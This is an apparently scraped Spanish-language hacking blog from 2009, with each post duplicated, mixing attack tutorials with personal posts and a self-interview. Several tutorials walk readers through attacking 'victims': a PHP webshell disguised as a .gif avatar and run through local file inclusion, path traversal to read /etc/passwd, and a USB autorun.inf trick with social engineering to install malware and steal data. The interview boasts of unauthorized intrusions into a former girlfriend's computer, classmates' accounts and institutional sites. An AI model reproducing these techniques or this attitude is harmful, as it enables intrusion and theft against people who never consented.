Creo que todos aquí alguna ves hemos visitado un foro o una comunidad online en la cual se nos permite ponernos un avatar una profile picture o algo que nos identifica ahora pues les voy a enseñar que si la web es vulnerable a LFI con esto pues podriamos ganar ventaja sobre el host victima...


Escaneamos la web de nuestra victima y tiene un LFI pero el server está bien configurado entonces no podemos sacar el passwd ni nada importante pero queremos no se a lo mejor ejecutar comandos...

digamos que el creamos un documento algo asi:


passthru($_GET[cmd])
?>

y lo guardamos como .gif o .jpg pero en esta ocación lo haremos con un .gif entonces guardamos el archivo y ahora vamos al upload de avatar y subimos nuestro programita...


Ahora si hemos subido eso pues con el LFI que tenemos podriamos hacer algo asi:

http://vuln.com/index.php?avid=../web/avatar.gif&cmd=ls -l

y seguramente nos mostraría que es lo que hay, asi como ese se podria hacer otro tipo de code para ejecutar codigo no permitido...

Espero les haya gustado este tutorial de como explotar un upload de avatar para poder llamar archivos expuestos en un LFI...


Saludos
Dr.White

Pentest: Explotación de LFI por Avatar Uploader

Creo que todos aquí alguna ves hemos visitado un foro o una comunidad online en la cual se nos permite ponernos un avatar una profile picture o algo que nos identifica ahora pues les voy a enseñar que si la web es vulnerable a LFI con esto pues podriamos ganar ventaja sobre el host victima...


Escaneamos la web de nuestra victima y tiene un LFI pero el server está bien configurado entonces no podemos sacar el passwd ni nada importante pero queremos no se a lo mejor ejecutar comandos...

digamos que el creamos un documento algo asi:


passthru($_GET[cmd])
?>

y lo guardamos como .gif o .jpg pero en esta ocación lo haremos con un .gif entonces guardamos el archivo y ahora vamos al upload de avatar y subimos nuestro programita...


Ahora si hemos subido eso pues con el LFI que tenemos podriamos hacer algo asi:

http://vuln.com/index.php?avid=../web/avatar.gif&cmd=ls -l

y seguramente nos mostraría que es lo que hay, asi como ese se podria hacer otro tipo de code para ejecutar codigo no permitido...

Espero les haya gustado este tutorial de como explotar un upload de avatar para poder llamar archivos expuestos en un LFI...


Saludos
Dr.White

Aprendamos Pyth0n Juntos

Bueno ahora les escribo para decirles que el dia de hoy he comenzado a aprender pyth0n... no tengo mucho tiempo para aprender pero voy a dejar un poco de lado el perl para practicar el python... me han dicho que se parecen pero que el python es mas ordenado e inclusive mas fácil, les quiero recomendar lo que estoy leyendo para que aprendamos juntos =)

El primer manual es un PDF que se llama Pyth0n para todos...


Click para ver Pyth0n para Todos

Ahora aquí les dejo otro manual de Sockets en pyth0n no muy bueno pero te da un resumen rápido:

Click Aquí

Tambien estoy leyendo estos manuales hechos por ricardo narvaja:

Click aquí para verlos


Espero que podamos compartir luego nuestros programas y hacer cosas provechosas con el conocimiento que adquiramos despues de leer...


Saludos
Dr.White

Aprendamos Pyth0n Juntos

Bueno ahora les escribo para decirles que el dia de hoy he comenzado a aprender pyth0n... no tengo mucho tiempo para aprender pero voy a dejar un poco de lado el perl para practicar el python... me han dicho que se parecen pero que el python es mas ordenado e inclusive mas fácil, les quiero recomendar lo que estoy leyendo para que aprendamos juntos =)

El primer manual es un PDF que se llama Pyth0n para todos...


Click para ver Pyth0n para Todos

Ahora aquí les dejo otro manual de Sockets en pyth0n no muy bueno pero te da un resumen rápido:

Click Aquí

Tambien estoy leyendo estos manuales hechos por ricardo narvaja:

Click aquí para verlos


Espero que podamos compartir luego nuestros programas y hacer cosas provechosas con el conocimiento que adquiramos despues de leer...


Saludos
Dr.White

martes, 20 de octubre de 2009

PenTest: LFI por Require

Bueno pues diganme quien no ha usado la funcion require() pues dejenme contarles que a traves de ella se puede explotar un LFI de la siguiente mmanera:

require("includes/".$file);


ese es un tipico uso del require por el cual usando un path trasversal despues del file= no permitiria ganar acceso a ficheros como el passwd.. forma de explotación:

http://vuln.com/index.php?file=../../../etc/passwd


Si dentro del code incluyeramos mas especificaciones de los tipo de archivos y rutas pues podríamos usar el apreciado nullbyte para bypassear

require("includes/".$_COOKIE['data'].".php");


Ahora digamos que tenemos ya para explotar con un lfi podriamos hacer lo siguiente:

document.cookie = "data=../../../../../etc/passwd";

Con eso podríamos mandar en un msgbox los datos del archivo convocado por la funcion document.cookie previamente ejecutada con el javascript...



Una forma de como evitar esto sería agregando un str_replace() previamente al require() obviamente ustedes elijirán que filtran o que no filtran

Espero que les haya gustado el tutorial...


Saludos
Dr.White

PenTest: LFI por Require

Bueno pues diganme quien no ha usado la funcion require() pues dejenme contarles que a traves de ella se puede explotar un LFI de la siguiente mmanera:

require("includes/".$file);


ese es un tipico uso del require por el cual usando un path trasversal despues del file= no permitiria ganar acceso a ficheros como el passwd.. forma de explotación:

http://vuln.com/index.php?file=../../../etc/passwd


Si dentro del code incluyeramos mas especificaciones de los tipo de archivos y rutas pues podríamos usar el apreciado nullbyte para bypassear

require("includes/".$_COOKIE['data'].".php");


Ahora digamos que tenemos ya para explotar con un lfi podriamos hacer lo siguiente:

document.cookie = "data=../../../../../etc/passwd";

Con eso podríamos mandar en un msgbox los datos del archivo convocado por la funcion document.cookie previamente ejecutada con el javascript...



Una forma de como evitar esto sería agregando un str_replace() previamente al require() obviamente ustedes elijirán que filtran o que no filtran

Espero que les haya gustado el tutorial...


Saludos
Dr.White

El Lado del Mal - Maligno

Quiero hacer una entrada pequeña nada mas pero para recomendarles el blog de seguridad informatica elladodelmal es un blog de lo mas simpatico con mucho contenido sobre seguridad informática pero un poco avanzada en relación a lo que se ofrese en este blog ya que con forme el tiempo pasa me gusta aumentar con la dificultad de los temas para todos poder aprender juntos, El Lado del Mal es administrado por MALIGNO, el pertenece al team de informatica64 una web de seguridad muy reconocida por sus proyectos.


Espero visiten ese blog creanme mejor visitenlo solo si creen tener un conocimiento avanzado de lo contrario se confundirán con cosas que observaran ahí, Espero que les sirva la info de ese blog.


Saludos
Dr.White

El Lado del Mal - Maligno

Quiero hacer una entrada pequeña nada mas pero para recomendarles el blog de seguridad informatica elladodelmal es un blog de lo mas simpatico con mucho contenido sobre seguridad informática pero un poco avanzada en relación a lo que se ofrese en este blog ya que con forme el tiempo pasa me gusta aumentar con la dificultad de los temas para todos poder aprender juntos, El Lado del Mal es administrado por MALIGNO, el pertenece al team de informatica64 una web de seguridad muy reconocida por sus proyectos.


Espero visiten ese blog creanme mejor visitenlo solo si creen tener un conocimiento avanzado de lo contrario se confundirán con cosas que observaran ahí, Espero que les sirva la info de ese blog.


Saludos
Dr.White

OFF: Lo que me pasó hoy -.- Segunda Parte

Again and Again jaja otra ves me pasó algo parecido... esta ves solo lo quiero resumir un poco, nos mandan a hacer un crucigrama y entonces la maestra dice lo pueden hacer a mano o si quieren hay un programa que "El Dr.White debe conocer, me encanta ese nombre" y pues "usted lo conoce?" mi respuesta fue ¬¬ no no lo conosco y su respuesta fue: "Ve ahora hasta se mas de tecnologia que el dr.white" jajaja en ese momento ya que podía hacer pero me gusta compartir mis anecdotas ya que por lo menos a mi me parecen chistosas jaja


Insisto, no todos sabemos de todos los temas, se supone que debo conocer un programa para hacer crucigramas?


Saludos
Dr.White

OFF: Lo que me pasó hoy -.- Segunda Parte

Again and Again jaja otra ves me pasó algo parecido... esta ves solo lo quiero resumir un poco, nos mandan a hacer un crucigrama y entonces la maestra dice lo pueden hacer a mano o si quieren hay un programa que "El Dr.White debe conocer, me encanta ese nombre" y pues "usted lo conoce?" mi respuesta fue ¬¬ no no lo conosco y su respuesta fue: "Ve ahora hasta se mas de tecnologia que el dr.white" jajaja en ese momento ya que podía hacer pero me gusta compartir mis anecdotas ya que por lo menos a mi me parecen chistosas jaja


Insisto, no todos sabemos de todos los temas, se supone que debo conocer un programa para hacer crucigramas?


Saludos
Dr.White

lunes, 19 de octubre de 2009

Fanática #1 de SeguridadBlanca

Hoy hace un rato recibí imagenes de la fanatica numero 1 de seguridad blanca =) 4ws0m3 pictures...


las fotos son anonimas =( solo dice fanática numero 1 =) me gustaría agradecer el apoyo a la chica que hizo esto...

sin mas que decir aquí les van:


Image and video hosting by TinyPic

Image and video hosting by TinyPic

Image and video hosting by TinyPic



@Fanática:

De verdad te quiero agradecer por haber puesto en riesgo tu integridad por tu pasión hacia el blog, me gustaría agradecerte y esta es la mejor manera que conosco haciendo esta entrada en tu honor, muchisimas gracias...


Texto de su email:

Dr.White, Aprecio su trabajo como escritor del blog seguridadblanca y quisiera recompenzar su trabajo con unas imagenes que hice con mucho cariño y dedicación para seguridadblanca, espero las ponga en un post del blog.

con cariño.
F4nática #1


Omito detalles por respeto...

Gracias de nuevo...


Saludos
Dr.White

Fanática #1 de SeguridadBlanca

Hoy hace un rato recibí imagenes de la fanatica numero 1 de seguridad blanca =) 4ws0m3 pictures...


las fotos son anonimas =( solo dice fanática numero 1 =) me gustaría agradecer el apoyo a la chica que hizo esto...

sin mas que decir aquí les van:


Image and video hosting by TinyPic

Image and video hosting by TinyPic

Image and video hosting by TinyPic



@Fanática:

De verdad te quiero agradecer por haber puesto en riesgo tu integridad por tu pasión hacia el blog, me gustaría agradecerte y esta es la mejor manera que conosco haciendo esta entrada en tu honor, muchisimas gracias...


Texto de su email:

Dr.White, Aprecio su trabajo como escritor del blog seguridadblanca y quisiera recompenzar su trabajo con unas imagenes que hice con mucho cariño y dedicación para seguridadblanca, espero las ponga en un post del blog.

con cariño.
F4nática #1


Omito detalles por respeto...

Gracias de nuevo...


Saludos
Dr.White

Infectando PCs con Malware por Autorun


Como muchos han escuchado hay maneras y maneras de infectar gente pero se imaginan solo decirle mira la imagen que hay en mi pen-drive mira y cuando lo metes se infecte con un troyano? pues lo que les voy a enseñar a continuación es con fines educativos...

Primero que todo debbemos de crear nuestro malware con el que queremos infectar a la victima...


una ves creado el malware vamos a abrir un Bloc de notas que llamaremos autorun.inf y dentro de el vamos a poner el siguiente codigo:

[Autorun]
label=pendrive limitex
Icon=icono.ico
Open=malware.exe


Ahora con ese codigo al meter el pendrive va a ejecutar nuestro malware.exe que pues nos hara creer que es un autorun del pendrive...

Ahora la Ingeniería social...

Vamos a decirle a la persona oye mira la imagen de "El hombre Araña" que encontré entonces la dentro de tu pendrive tambien pondras la imagen del hombre araña que lo que hará será hacer pensar a la victima que si le quería mostrar la imagen sin embargo ya la has infectado con tu malware.

Este tipo de infección no es muy segura ya que el usuario puede tener bloqueado los autoruns por seguridad al igual que lo deberiamos de hacer todos para bloquear w0rms como conficker u otros...

en el code del malware ustedes pueden poner lo que quieran o en su defecto a lo mejor no ponen el code de un malware sino un codigo de copiado de archivos para robarle datos e información a la víctima quizas una conversación de msn quizas una cookie que es mas complejo pero de todo podemos robar de esta manera...


Espero les haya gustado el tutorial y para aquellos que necesitan mas ayuda con el autorun les recomiendo el siguiente programa:

Click Aquí

El programa te ayuda a crear los autoruns para tus .exe


Saludos
Dr.White

Infectando PCs con Malware por Autorun


Como muchos han escuchado hay maneras y maneras de infectar gente pero se imaginan solo decirle mira la imagen que hay en mi pen-drive mira y cuando lo metes se infecte con un troyano? pues lo que les voy a enseñar a continuación es con fines educativos...

Primero que todo debbemos de crear nuestro malware con el que queremos infectar a la victima...


una ves creado el malware vamos a abrir un Bloc de notas que llamaremos autorun.inf y dentro de el vamos a poner el siguiente codigo:

[Autorun]
label=pendrive limitex
Icon=icono.ico
Open=malware.exe


Ahora con ese codigo al meter el pendrive va a ejecutar nuestro malware.exe que pues nos hara creer que es un autorun del pendrive...

Ahora la Ingeniería social...

Vamos a decirle a la persona oye mira la imagen de "El hombre Araña" que encontré entonces la dentro de tu pendrive tambien pondras la imagen del hombre araña que lo que hará será hacer pensar a la victima que si le quería mostrar la imagen sin embargo ya la has infectado con tu malware.

Este tipo de infección no es muy segura ya que el usuario puede tener bloqueado los autoruns por seguridad al igual que lo deberiamos de hacer todos para bloquear w0rms como conficker u otros...

en el code del malware ustedes pueden poner lo que quieran o en su defecto a lo mejor no ponen el code de un malware sino un codigo de copiado de archivos para robarle datos e información a la víctima quizas una conversación de msn quizas una cookie que es mas complejo pero de todo podemos robar de esta manera...


Espero les haya gustado el tutorial y para aquellos que necesitan mas ayuda con el autorun les recomiendo el siguiente programa:

Click Aquí

El programa te ayuda a crear los autoruns para tus .exe


Saludos
Dr.White

viernes, 16 de octubre de 2009

Respuesta a la entrevista de Zenga...

1.- ¿ Hola, Dédalo o DR. white ?
- Dédalo uso en las comunidades y foros ya que no muchos aceptan puntos.
2.- ¿porque optaste por este nick?
- Opte por user Dr.White ya que quería explorar el mundo white hat y dédalo por el inventor de la mitologia griega.
3.- ¿Tiene algun significado personal ó transfonde de ser?
- Pienso ser Doctor en Seguridad Informática y Dédalo por que me gusta como era el.
4.- ¿De que pais eres?
- Perú
5.- ¿Que edad tienes?
- 16 Años.
6.- ¿Como fue tu primer contacto con una computadora?
- Tenia como 7 años y mi abuelo compro una y la use jugue mario bros de ese tiempo.
7.- ¿ Al tener contacto con la informatica, ya sabias que querias pasar la balla del usuario comun ó solo fue coincidencia el estar en el nivel que tienes actualmente?
- Fue extraño comenzé con los juegos online y me hackearon entonces decidi ver como era lo de hackear.
8.- ¿A que te dedicas en la actualidad a parte de dedicarte al mundo de la seguridad Informatica?
- Hago Box, Juego Futbol a veces y asisto a un colegio en 4to año de secundaria.
9.- ¿A que edad iniciaste en este mundo tan misterioso, enigmatico y Maravilloso de la seguridad informatica?
- 14 años.
10.-¿Que te motivo a adentrarte a ser parte de esta marea de concimiento?
- Que me gustaba el hecho de poder entrar a lugares a los que no debo jajajaja.
11.-¿Que fue lo primero que leiste al iniciarte en la seguridad informatica?
- Keyloggers y Malware en Si.
12.-¿Que fue lo primero que aprendiste del hacking ?
- Infección por malware a la gente.
13.-¿Cuando iniciabas en este asunto cuantas horas te pasabas en la red y por supuesto en el PC.?
- mi maximo fue empezar un domingo a las 4pm y salir a las 3pm del martes, obviamente salia para almorzar,
pero eso fue solo esa ves recibí un reproche de parte de mi familia y me tube que calmar y para de aprender un poco.
14.-¿En tus principios cual fue tu primer accion " hacker" que lograste realizar ?
- Bueno pues no quiero hablar de eso pero ya que fue hace tiempo fue entrar a la PC de una Ex-Novia y Robarle el MSN y Hi5.
15.-¿Te has desanimado alguna vez, al ver lo mucho que se tiene que estudiar, aprender y practicar?
- Pues hay temas que por mas que se leen son complicados de aprender, la Sql Injection algo que muchos dominan
es un tema extremadamente largo ya que hay muchos tipos, y si me he desanimado cuando vi por primera ves ldap injection
sin saber que era ldap jajaja.
16.-¿Alguna referencia que puedas recomendar a los que lean esta entrevista, de como empezar en el Hacking?
- Les recomiendo irse por el analisis de malware antes que todo ya que eso le sirve para el crackeo de software y para
sierto tipo de analisis forense segun el malware.
17.-¿Has sido parte de algun team, elite, grupo hack?
- Pues al principio cuando era medio lammer yo quería entrar a muchos teams trate de entrar a varios pero no podía
por falta de conocimiento y pues eso me motivo a aprender y a querer trabajar solo.
18.-¿cuanto tiempo le dedicas a aprender sobre seguridad Informatica?
- serca de 4h diarias entre ella la actualizacion de mi blog.
19.-¿cuanto tiempo le dedicas a ser Hacker Etico?
- Depende de los dias pero asi mismo unas 4h al dia y depende de los dias.
20.-¿En que lenguajes te gusta programar?
- Programo en Varios pero los que mas me gustan son PHP y Perl.
21.-¿Alunas tools que hayas desarrollado, para test, atacar ó defender ?
- Algunas no las he subido a la red pero el Admin Path Finder mi Dedalo TexHex, mis Dedalo port informators...
22.-¿Algunas Tools que esten en desarrollo?
- H4P Hack For PenTesters Es una tool que te permite hacer muchas cosas en entorno a ayudar un pen-tester que servirá
para windows y linux y programada en PERL.
23.-¿Para ser pentest es necesario saber programar?
- Depende desde el ángulo que lo veas pero yo creo que Si.
24.-¿Que conocimientos se requieren para ser Pentest?
- Mas que nada creo que debes de saber programar y mas que nada tener imaginación.
25.-¿Que conocimientos se requieren para ser Hacker etico?
- Pues yo creo que se relacionan el ser pen-tester y hacker ético asi que puede ser que sean los mismos conocimientos.
26.-¿En que proyectos estas trabajando actualmente?
- Pues en el H4P y pues quiero ser parte del team de Open-Sec (empresa peruana de Seguridad)
27.-¿Has realizado algun acto Black hat para darte a conocer?, platicanos cuales..
- Pues vulnerar Tecsup, Vulnerar ISIL, he vulnerado algunos otros sitios pero prefiero quedar en el anónimato,
En mi colegio he hackeado el messenger de algunos jaja pero no por lammer sino mas bien por el hecho de que ellos me joden
a veces y yo les digo cuidado... les aviso y se burlan entonces ya pues una asustadita pero no soy de los que cambian pass
mas bien me tomo una captura de pantalla y la subo a algun lugar y la muestro pero nada mas...
28.-¿Has realizado algun acto white hat para darte a conocer?, platicanos cuales..
- he reportado multiples vulnerabilidades en varios sitios cuyos nombres prefiero mantener en el anonimato por ética.
29.-¿Que sistema (s) operativo(s) corre en tu PC?
- BackTrack 4 Pre-Release, Windows Vista, Windows XP y Ubuntu
30.-¿Que opinas sobre el tema de seguridad informatica que se vive en la actualidad ?. Desde tu enfoque y experiencia personal?
- Pues creo que algún dia se desatará una guerra cibernetica solo donde el mas experto y mas experimentado ganará.
31.-¿Que opinas sobre las nuevas ramas por asi mencionarlo, sobre el hacking, como lo es el haking etico, Black hat, white hat, gray hat?
- Pienso que para Defenderte debes aprender a atacar y si solo sabes defenderte siempre serás mas fácil de ser atacado.
32.-¿Te defines mas como un pestest, ó tambien alguno de los conceptos mencionados en la pregunta anterior?
- Pienso que soy un White Hat Hacker que si se necesita hacer justicia se hará black hat como es el caso de las webs
de pedofilia que tanto odio.
33.-¿Como te visualizas personalmente y profesionalmente en un futuro?
- Con una empresa de Asesoría y/o consultoría de seguridad informática y Diseño de Software y Web Scripts
34.-¿Algun personaje del medio que admires?
- Pues así como admirar a ninguno pero respeto a varios.
35.-¿Algun personaje del medio que quieras conocer en persona?
- Me Gustaría conocer a dos personas a MURDER el dueño de DiosDeLaRed no por que sienta que es un h4x0r o guru de la informática
sino por que quisiera saber de sus experiencias como admin de ddlr y experiencia en la red jaja y a Kevin Mitnick pues me gustaría escuchar de sus historias
al igual que a MURDER.
36.-¿como nace el blog seguridadblanca.blogspot.com?
- Con mi amigo Jbyte queriamos abrir un blog pero habian complicaciones asi que un dia decidí un dia abrir ese blog...
37.-¿que tiempo lleva On Line?
- Desde el 31 de Mayo.
38.-¿Que satisfacciones te ha dejado?
- Solo me satisface el hecho de que gente lea el blog y agradesca.
39.-¿Algunos problemas que te haya ocasionado el tener este blog?
- Problemas con mi papa por estar mucho tiempo en el PC.
40.-¿Que blog's sobre la tematica de seguridad, hacking visitas?
- SecurityBuDefault, Hacking-avanzado, segu-info, DragonJAR, entre otros.
41.-¿Que blog's visitas que no sean del tema de seguridad informatica ?
- Pues leo algunos de politica.
42.-¿Que foros visitas y recomiendas?
- DragonJAR y Xtremgiles - www.Dragonjar.org y www.Xremfiles.com
43.-¿Que opinion tienes sobre el " Hacker " yo los definiria como Lamers que perjudica a web's con un deface, ó que anda asiendo de las suyas con xploit's bajados de webs como milworm, hack0wn, etc ?
- yo les diría que deben de mejorar y buscar sus propios bugs.
44.-¿Hay informacion suficiente en la red, para aprender el hacking ó aprender seguridad Informatica?
- Si.
45.-¿Has cursado algun diplomado, curso, ó certificación sobre seguridad informatica o hacking etico?
- Diplomado en administración en Sistemas Linux.
46.-¿Es necesario un curso, un diplomado ó una certificacion para ser hacker etico?
- Para serlo legal si.
47.-¿En cuantas conferencias y platicas has participado?
- Como oyente en unas 3 y como expositor en ninguna oficial.
48.-¿Que temas has abordado en esas conferencias ó platicas?
- remote Code Execution y Pharming y Phishing en las expuestas por mi.
49.-¿Algunas experiencias agradables que hayas tenido en una platica o conferencia que nos quieras compartir?
- Pues mas que nada me gusta conocer gente.
50.-¿Algunas experiencias desagradables que hayas tenido en una platica o conferencia que nos quieras compartir?
- Ninguna en realidad.

PASANDO EN EL PLANO MAS PERSONAL.

51.-¿Que actividades realizas en tus ratos libres?
- Futbol, Box o estar con mis amigos; en algunos casos programo.
52.-¿Te consideras un chico normal? si, no ¿y porque?
- Si me considero nomal.
53.-¿Consideras que para ser hacker debes tener un intelecto mayor a la media ó cualquiera que se lo proponga puede serlo?
- Cualquiera que lo proponga que tenga ingenio e imaginación.
54.-¿Has utilizado el ser hacker para ganarte un lugar entre tu circulo social u obtener algun beneficio personal?
- Si y no me molesta decirlo ya que uno no solo debe aprender a entrar a sistemas para sentarse en una silla y solo trabajar
y no soy hacker.
55.-¿Eres timido ó extrovertido?
- Depende de la situación.
56.-¿Que programas de television te gusta ver, cuando estas en tus ratos de ocio?
- no veo mucha tele pero
57.-¿tienes novia?
- No no me gusta sentirme precionado ante una sola mujer excepto que cumpla con mis necesidades de todo tipo.
58.-En en caso que la pregunta anterior sea si, es dificil que nuestra pareja comprenda nuestra adicción a la informatica, ¿Tu como manejas esa situacion?... Yo en mi caso le propongo ir a bailar despues de terminar lo que yo este haciendo en el PC jeje.
- Cuando tenía ella me decía que deje el hack y eso.
59.-Todos tenemos metas por cumplir a corto y mediano plazo, ¿cuales son las tuyas ?
- Ser Asesor en Seguridad Informática, tener una empresa de consultoría y hacer crecer mi blog.
60.-¿Que te gusta leer?
- Libros de Terror y de Seguridad Informatica; Tambien me gusta en particular paulo coelho.
61.-¿Que opina tu familia sobre tu vocacion y dedicacion a la seguridad informatica?
- Que está muy bien pero a veces no me siento apoyado por parte de algunos miembros en particular.
62.-¿Repercute tu dedicacion a esta profesion, en en el rendimiento escolar? ó ¿eres un buen estudiante?
- Malo estudiante, es curioso mi I.Q es superior al normal pero parece que lo que interpreta mi cerebro es la programación
63.-¿como es un fin de samana ya sea sabado o domingo de Dédalo?
- Pues Actualizo el Blog luego en las tardes salgo con mi padre pues es con quien vivo y en las noches salgo con mis amigos
64.-¿Algun consejo que nos pudieras dar a los que iniciamos en este rollo (seguridad informatica)?
- Nunca Se rindan brothers este mundo es muy chevere y es cuestion de imaginación.
65.-¿Alguna otra cosa que te gustaria agregar ó compartir a los que leamos esta entrevista.?
- Quisiera solo Dar Agradecimientos a las personas que me han apoyado en este medio:

@Jbyte
@Perverthso
@Dr.Ne0x
@D4rkD3m0n
@BackTracker
@Chelano
@Walter Cuestas
@Syntex
@Segio Buenaventura
@Vit0y4
@Mi papá
@Ricardo Salazar
@Mi Familia
@Amigos del Cole
@Martin Leyton
@Succeded
@Pr@fes0r_X

Y todo Seguridad Blanca y XtremFiles...

============================================


Yuset Gracias Por la Entrevista.


Saludos
Dr.White

Respuesta a la entrevista de Zenga...

1.- ¿ Hola, Dédalo o DR. white ?
- Dédalo uso en las comunidades y foros ya que no muchos aceptan puntos.
2.- ¿porque optaste por este nick?
- Opte por user Dr.White ya que quería explorar el mundo white hat y dédalo por el inventor de la mitologia griega.
3.- ¿Tiene algun significado personal ó transfonde de ser?
- Pienso ser Doctor en Seguridad Informática y Dédalo por que me gusta como era el.
4.- ¿De que pais eres?
- Perú
5.- ¿Que edad tienes?
- 16 Años.
6.- ¿Como fue tu primer contacto con una computadora?
- Tenia como 7 años y mi abuelo compro una y la use jugue mario bros de ese tiempo.
7.- ¿ Al tener contacto con la informatica, ya sabias que querias pasar la balla del usuario comun ó solo fue coincidencia el estar en el nivel que tienes actualmente?
- Fue extraño comenzé con los juegos online y me hackearon entonces decidi ver como era lo de hackear.
8.- ¿A que te dedicas en la actualidad a parte de dedicarte al mundo de la seguridad Informatica?
- Hago Box, Juego Futbol a veces y asisto a un colegio en 4to año de secundaria.
9.- ¿A que edad iniciaste en este mundo tan misterioso, enigmatico y Maravilloso de la seguridad informatica?
- 14 años.
10.-¿Que te motivo a adentrarte a ser parte de esta marea de concimiento?
- Que me gustaba el hecho de poder entrar a lugares a los que no debo jajajaja.
11.-¿Que fue lo primero que leiste al iniciarte en la seguridad informatica?
- Keyloggers y Malware en Si.
12.-¿Que fue lo primero que aprendiste del hacking ?
- Infección por malware a la gente.
13.-¿Cuando iniciabas en este asunto cuantas horas te pasabas en la red y por supuesto en el PC.?
- mi maximo fue empezar un domingo a las 4pm y salir a las 3pm del martes, obviamente salia para almorzar,
pero eso fue solo esa ves recibí un reproche de parte de mi familia y me tube que calmar y para de aprender un poco.
14.-¿En tus principios cual fue tu primer accion " hacker" que lograste realizar ?
- Bueno pues no quiero hablar de eso pero ya que fue hace tiempo fue entrar a la PC de una Ex-Novia y Robarle el MSN y Hi5.
15.-¿Te has desanimado alguna vez, al ver lo mucho que se tiene que estudiar, aprender y practicar?
- Pues hay temas que por mas que se leen son complicados de aprender, la Sql Injection algo que muchos dominan
es un tema extremadamente largo ya que hay muchos tipos, y si me he desanimado cuando vi por primera ves ldap injection
sin saber que era ldap jajaja.
16.-¿Alguna referencia que puedas recomendar a los que lean esta entrevista, de como empezar en el Hacking?
- Les recomiendo irse por el analisis de malware antes que todo ya que eso le sirve para el crackeo de software y para
sierto tipo de analisis forense segun el malware.
17.-¿Has sido parte de algun team, elite, grupo hack?
- Pues al principio cuando era medio lammer yo quería entrar a muchos teams trate de entrar a varios pero no podía
por falta de conocimiento y pues eso me motivo a aprender y a querer trabajar solo.
18.-¿cuanto tiempo le dedicas a aprender sobre seguridad Informatica?
- serca de 4h diarias entre ella la actualizacion de mi blog.
19.-¿cuanto tiempo le dedicas a ser Hacker Etico?
- Depende de los dias pero asi mismo unas 4h al dia y depende de los dias.
20.-¿En que lenguajes te gusta programar?
- Programo en Varios pero los que mas me gustan son PHP y Perl.
21.-¿Alunas tools que hayas desarrollado, para test, atacar ó defender ?
- Algunas no las he subido a la red pero el Admin Path Finder mi Dedalo TexHex, mis Dedalo port informators...
22.-¿Algunas Tools que esten en desarrollo?
- H4P Hack For PenTesters Es una tool que te permite hacer muchas cosas en entorno a ayudar un pen-tester que servirá
para windows y linux y programada en PERL.
23.-¿Para ser pentest es necesario saber programar?
- Depende desde el ángulo que lo veas pero yo creo que Si.
24.-¿Que conocimientos se requieren para ser Pentest?
- Mas que nada creo que debes de saber programar y mas que nada tener imaginación.
25.-¿Que conocimientos se requieren para ser Hacker etico?
- Pues yo creo que se relacionan el ser pen-tester y hacker ético asi que puede ser que sean los mismos conocimientos.
26.-¿En que proyectos estas trabajando actualmente?
- Pues en el H4P y pues quiero ser parte del team de Open-Sec (empresa peruana de Seguridad)
27.-¿Has realizado algun acto Black hat para darte a conocer?, platicanos cuales..
- Pues vulnerar Tecsup, Vulnerar ISIL, he vulnerado algunos otros sitios pero prefiero quedar en el anónimato,
En mi colegio he hackeado el messenger de algunos jaja pero no por lammer sino mas bien por el hecho de que ellos me joden
a veces y yo les digo cuidado... les aviso y se burlan entonces ya pues una asustadita pero no soy de los que cambian pass
mas bien me tomo una captura de pantalla y la subo a algun lugar y la muestro pero nada mas...
28.-¿Has realizado algun acto white hat para darte a conocer?, platicanos cuales..
- he reportado multiples vulnerabilidades en varios sitios cuyos nombres prefiero mantener en el anonimato por ética.
29.-¿Que sistema (s) operativo(s) corre en tu PC?
- BackTrack 4 Pre-Release, Windows Vista, Windows XP y Ubuntu
30.-¿Que opinas sobre el tema de seguridad informatica que se vive en la actualidad ?. Desde tu enfoque y experiencia personal?
- Pues creo que algún dia se desatará una guerra cibernetica solo donde el mas experto y mas experimentado ganará.
31.-¿Que opinas sobre las nuevas ramas por asi mencionarlo, sobre el hacking, como lo es el haking etico, Black hat, white hat, gray hat?
- Pienso que para Defenderte debes aprender a atacar y si solo sabes defenderte siempre serás mas fácil de ser atacado.
32.-¿Te defines mas como un pestest, ó tambien alguno de los conceptos mencionados en la pregunta anterior?
- Pienso que soy un White Hat Hacker que si se necesita hacer justicia se hará black hat como es el caso de las webs
de pedofilia que tanto odio.
33.-¿Como te visualizas personalmente y profesionalmente en un futuro?
- Con una empresa de Asesoría y/o consultoría de seguridad informática y Diseño de Software y Web Scripts
34.-¿Algun personaje del medio que admires?
- Pues así como admirar a ninguno pero respeto a varios.
35.-¿Algun personaje del medio que quieras conocer en persona?
- Me Gustaría conocer a dos personas a MURDER el dueño de DiosDeLaRed no por que sienta que es un h4x0r o guru de la informática
sino por que quisiera saber de sus experiencias como admin de ddlr y experiencia en la red jaja y a Kevin Mitnick pues me gustaría escuchar de sus historias
al igual que a MURDER.
36.-¿como nace el blog seguridadblanca.blogspot.com?
- Con mi amigo Jbyte queriamos abrir un blog pero habian complicaciones asi que un dia decidí un dia abrir ese blog...
37.-¿que tiempo lleva On Line?
- Desde el 31 de Mayo.
38.-¿Que satisfacciones te ha dejado?
- Solo me satisface el hecho de que gente lea el blog y agradesca.
39.-¿Algunos problemas que te haya ocasionado el tener este blog?
- Problemas con mi papa por estar mucho tiempo en el PC.
40.-¿Que blog's sobre la tematica de seguridad, hacking visitas?
- SecurityBuDefault, Hacking-avanzado, segu-info, DragonJAR, entre otros.
41.-¿Que blog's visitas que no sean del tema de seguridad informatica ?
- Pues leo algunos de politica.
42.-¿Que foros visitas y recomiendas?
- DragonJAR y Xtremgiles - www.Dragonjar.org y www.Xremfiles.com
43.-¿Que opinion tienes sobre el " Hacker " yo los definiria como Lamers que perjudica a web's con un deface, ó que anda asiendo de las suyas con xploit's bajados de webs como milworm, hack0wn, etc ?
- yo les diría que deben de mejorar y buscar sus propios bugs.
44.-¿Hay informacion suficiente en la red, para aprender el hacking ó aprender seguridad Informatica?
- Si.
45.-¿Has cursado algun diplomado, curso, ó certificación sobre seguridad informatica o hacking etico?
- Diplomado en administración en Sistemas Linux.
46.-¿Es necesario un curso, un diplomado ó una certificacion para ser hacker etico?
- Para serlo legal si.
47.-¿En cuantas conferencias y platicas has participado?
- Como oyente en unas 3 y como expositor en ninguna oficial.
48.-¿Que temas has abordado en esas conferencias ó platicas?
- remote Code Execution y Pharming y Phishing en las expuestas por mi.
49.-¿Algunas experiencias agradables que hayas tenido en una platica o conferencia que nos quieras compartir?
- Pues mas que nada me gusta conocer gente.
50.-¿Algunas experiencias desagradables que hayas tenido en una platica o conferencia que nos quieras compartir?
- Ninguna en realidad.

PASANDO EN EL PLANO MAS PERSONAL.

51.-¿Que actividades realizas en tus ratos libres?
- Futbol, Box o estar con mis amigos; en algunos casos programo.
